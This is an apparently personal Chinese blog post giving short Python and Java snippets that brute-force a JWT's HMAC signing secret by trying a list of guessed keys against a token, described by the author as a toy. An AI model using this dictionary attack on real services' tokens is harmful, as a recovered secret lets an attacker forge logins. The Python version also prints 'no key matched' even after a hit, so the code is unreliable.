猜JWT关键字

• 确定加密方式
• 使用的包（依赖）[authlib.jose,auth0.jwt]
• 破解sercet

写着玩的，没有什么价值，成功就和彩票一样，记录一下；
就是靠猜，哈哈哈~~

python

''' @Author: Jeff.zheng @Date : 2022/4/22 @Desc : '''
from authlib.jose import jwt

def bruteforce(token):
    #这里是秘钥，可以挨着试，成功极低
    easykeys = ["sercet1", "sercet2", "sercet3", "sercet5"] 
    for easykey in easykeys:
        try:
            jwt.decode(token.encode(encoding='utf-8'), easykey)
            print("秘钥：", easykey)
        except Exception as e:
            pass
    print("没有匹配到秘钥")


if __name__ == '__main__':
    token = "token"
    bruteforce(token)

java代码

import com.auth0.jwt.JWT;
import com.auth0.jwt.JWTVerifier;
import com.auth0.jwt.algorithms.Algorithm;
import com.auth0.jwt.interfaces.DecodedJWT;

/** * @author: Jeff.zheng * @description: * @date: 2022/7/20 15:02 * @version: 1.0.0 */
public class TestToken {
    
    public  static  String token ="token";//这里放要破解的token

    public static void main(String[] args) {
    


        String [] mykeys = {
    "sercet1","sercet2","sercet3","sercet4" };//这里放可能的秘钥
        for (String mykey :mykeys ) {
    
            if(forceToken(mykey)){
    
                System.out.println("成功，key=》"+mykey);//成功的key
            }else {
    
                System.out.println("失败，key=》"+mykey);//失败的key
            }
        }
    }


    static Boolean forceToken(String secrete){
    
        try {
    
            JWTVerifier jwtVerifier = JWT.require(Algorithm.HMAC256(secrete)).build();
            DecodedJWT verify = null;
            verify = jwtVerifier.verify(token);
            return  true;
        }catch (Exception e){
    
            return false;
        }
    }
}